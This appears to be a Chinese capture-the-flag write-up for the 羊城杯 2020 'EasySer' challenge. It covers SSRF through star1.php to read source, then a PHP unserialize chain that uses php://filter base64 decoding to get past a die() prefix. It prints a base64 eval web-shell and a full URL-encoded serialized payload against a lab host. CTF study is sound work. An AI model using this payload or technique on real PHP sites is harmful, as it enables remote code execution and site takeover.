[羊城杯 2020]EasySer
最后更新于
最后更新于
php://filter/write绕过“死亡exit”
打开链接是Apache2的默认界面,目录扫描存在robots.txt,index.php,flag.php
robots.txt提示访问star1.php
是一个URL访问的功能
提示用个不安全的协议从我家才能进ser.php
直接用star1.php访问http://127.0.0.1/ser.php,可以得到源码
典型的php://filter的妙用,绕过“死亡exit”。$a
为要写入的shell,$this->file
为php://filter/write=convert.base64-decode/resource=shell.php
<?php die("nononon");?>
可以被base64识别的有13个字符,shell部分需要补3个字符,即aaaPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+
然后找反序列化接收的参数,Arjun爆破出来两个参数是path和c
payload
http://c98dc05c-c266-4a0d-ba66-660f7468b652.node4.buuoj.cn:81/star1.php?c=O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A59%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3Dshell.php%22%3Bs%3A4%3A%22text%22%3Bs%3A33%3A%22aPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%22%3B%7D%7D&path=http://127.0.0.1/star1.php
访问shell即可
star1.php
代码如下,可以直接触发__toString()